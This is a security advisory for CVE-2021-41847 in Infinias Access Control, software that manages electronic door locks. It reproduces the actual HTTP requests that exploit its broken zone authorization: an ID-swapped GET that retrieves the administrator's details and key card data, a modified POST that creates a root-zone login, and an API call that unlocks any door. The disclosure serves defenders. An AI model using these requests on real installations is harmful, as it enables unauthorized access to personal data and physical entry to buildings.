# Infinias Access Control Vulnerability
## CVE-2021-41847
## Broken Access Control and Escalation of Privilege
#### Tested on Product Version: 6.7.10708.0 and lower

### Overview:

Infinias Access Control is a physical access control software that can be installed on a central server to control electronic door locks. The software provides a web interface for users to login and administer the software.

Infinias Access Control System uses “Zones” to define separate areas within the software. Each zone is essentially a separate physical location in which the software has control over.

For example Zone A and Zone B would be two different physical locations either within a building or two separate buildings all together. Zone A and Zone B would both be under a parent or root zone at the top level, controlled by the administrator of the system.

The system administrator can assign users login credentials to specific zones that they are authorized to use to control the physical access to that zone.

For example the administrator assigns John Smith credentials to Zone A and Jane Doe credentials to Zone B. John Smith would not have access to Zone B and would not be able to see any information associated with Zone B, the same applies to Jane Doe, They would not have access to Zone A.

### Vulnerability:

Users that have valid credentials for one zone can access and even write information to another unauthorized zone.

For example John Smith who is assigned privileges to Zone A can send a modified HTTP GET request in his web browser to obtain information from zones that he is not authorized to access.

```
GET /IntelliM/people/GetDetails?id="USER_ID_NUMBER"&tzbias=-240&timestamp=1633094755770 HTTP/2
```

#### Simply copy a valid request, and change the id to another number. In my case if I change it to 001 I can retrieve the system administrators information.

```
HTTP/2 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
X-Aspnetmvc-Version: 5.2
X-Aspnet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 01 Oct 2021 13:37:24 GMT
Content-Length: 1465

{"success":true,"data":{"data":{"BadgeInfoStrings":[],"WiegandCredentials":[],"CustomCredentialStrings":[],"PersonalInfo":{"FirstName":" System","MiddleInitial":"","LastName":"Administrator","EmployeeId":"","Title":"","Suffix":"","DisplayName":"","Department":"","AllowStringCredentials":false,"DefaultStringCredentials":false},"ContactInfo":{"Company":"","Office":"","Building":"Main","Position":"","LicensePlateNumber":"","PrimaryEmail":"","SecondaryEmail":"","Notes":"","PrimaryPhoneNumber":"","PrimaryExtension":"","CellPhoneNumber":"","ReceivesAlarmNotifications":false},"GroupInfo":{"GroupsToAdd":null,"GroupsToRemove":null},"ExternalId":"","CustomFields":[],"IsCredentialHolder":true,"BadgeInfo":{"TimeZoneBias":0,"PinCode":null,"Status":null,"ActivationDateTime":null,"ExpirationDateTime":null,"ActivationDate":null,"ActivationTime":null,"ExpirationDate":null,"ExpirationTime":null,"Disabled":false,"SiteCode":null,"CardIssueCode":null,"ExternalId":null,"IsStringCredential":false,"IsValid":true,"HasData":false,"Id":0},"IsSystemUser":true,"RoleInfo":{"Role":"Administrator","Username":"admin","PasswordChanged":false,"Password":null,"ExternalId":null,"ZoneId":35,"ShowLocalTime":false,"Id":1},"SaveImage":false,"ZoneID":35,"AllowStringCredentials":false,"DefaultStringCredentials":false,"GroupContracts":[],"Id":1},"Count":0,"Licenses":[]},"errorList":null,"authToken":null}
```

The system returns all the information it has for the user such as name, address, phone number and any other personal information that the organization might enter into the system. As you can see, it also returns the key card credentials for that user meaning someone could use this method to retrieve the card data and create a new keycard and enter any facility that targeted person has access to.

It is also possible to create new system logins under zones that you should not be authorized to do so in. By first creating a new user login in my authorized zone and then copying the POST request then modifying and re-sending it I can create a user into the root zone with key card credentials and a web login. I can now log into the system at the root zone and have access to all other zones, users, and door access.

```
POST /IntelliM/people/Create HTTP/2


{"data":{"SaveImage":false,"BadgeInfoStrings":["{\"ActivationDateTime\":\"\",\"ExpirationDateTime\":\"\",\"ActivationDate\":\"2021-10-01\",\"ActivationTime\":\"09:46 AM\",\"_timeZoneBias\":-240,\"_pinCode\":\"\",\"_status\":\"\",\"_disabled\":false,\"_expirationDate\":\"\",\"_expirationTime\":\"\",\"_siteCode\":\"99\",\"_cardIssueCode\":\"22222\",\"ExternalId\":\"\",\"IsValid\":false,\"HasData\":false,\"_isStringCredential\":false,\"_displayId\":1,\"_allowStringCredentials\":false,\"_defaultStringCredentials\":false,\"DisplayId\":1,\"AllowStringCredentials\":false,\"DefaultStringCredentials\":false,\"TimeZoneBias\":-240,\"PinCode\":\"\",\"Status\":\"\",\"Disabled\":false,\"ExpirationDate\":\"\",\"ExpirationTime\":\"\",\"SiteCode\":\"99\",\"CardIssueCode\":\"22222\",\"IsStringCredential\":false}"],"WiegandCredentials":[],"CustomCredentialStrings":[],"PersonalInfo":{"FirstName":"test ","LastName":"person5"},"ContactInfo":{},"GroupInfo":{"GroupsToAdd":[],"GroupsToRemove":[]},"CustomFields":[],"BadgeInfo":{"ActivationDateTime":"","ExpirationDateTime":"","ActivationDate":"","ActivationTime":"","_timeZoneBias":0,"_pinCode":"","_status":"","_disabled":false,"_expirationDate":"","_expirationTime":"","_siteCode":"99","_cardIssueCode":"22222","ExternalId":"","IsValid":false,"HasData":false,"_isStringCredential":false,"TimeZoneBias":0,"PinCode":"","Status":"","Disabled":false,"ExpirationDate":"","ExpirationTime":"","SiteCode":"99","CardIssueCode":"22222","IsStringCredential":false},"RoleInfo":{"PasswordChanged":true,"IsSystemUserField":true,"Password":"password","PasswordConfirm":"password","Username":"testuser21","ZoneId":35,"Role":"Supervisor"},"AllowStringCredentials":false,"DefaultStringCredentials":false,"IsSystemUser":true}}
```

The new user you created will appear as being in the correct zone when looking at the general overview of users in that zone, only when the users profile is opened and the login role page is viewed will you notice that they actually have access to the root zone that should not be allowed.

### API

The API endpoint for the software is vulnerable as well making it easy to create custom scripts to access system information and even control doors.

You can easily send commands to the system targeted at doors outside of your zone access to unlock them. All you need to know is the door id number and you can send a PUT request using your credentials to unlock any door in the system.

```
http://INFINIASURL/infinias/ia/doors
LockStatus=unLocked&DoorIds='DOORID'&Duration=10&Username='USER'&Password='PASSWORD'
```

## Conclusion

I believe disclosure of this issue is important for anyone using this system.

The manufacturer has been notified about these issues and stated that they would be fixed in a future update of the system, but did not provide a timeline for when that would be and did not provide any solutions on securing the system in the mean time.

I believe anyone using this system, especially for muti-tenant deployments, should audit and limit user logins until a fix is issued. As well as ensure strong passwords are used on all accounts.

This system does not enforce a password policy, or require the admin credentials to be changed from default after installation. So it is possible someone could easily guess or brute force a login to any zone and then use this vulnerability to gain access to the entire system.

### Disclaimer
The code above has been created solely and exclusively as proof of concept, the failure has been reported to the manufacturer and we are not responsible for any missuse.
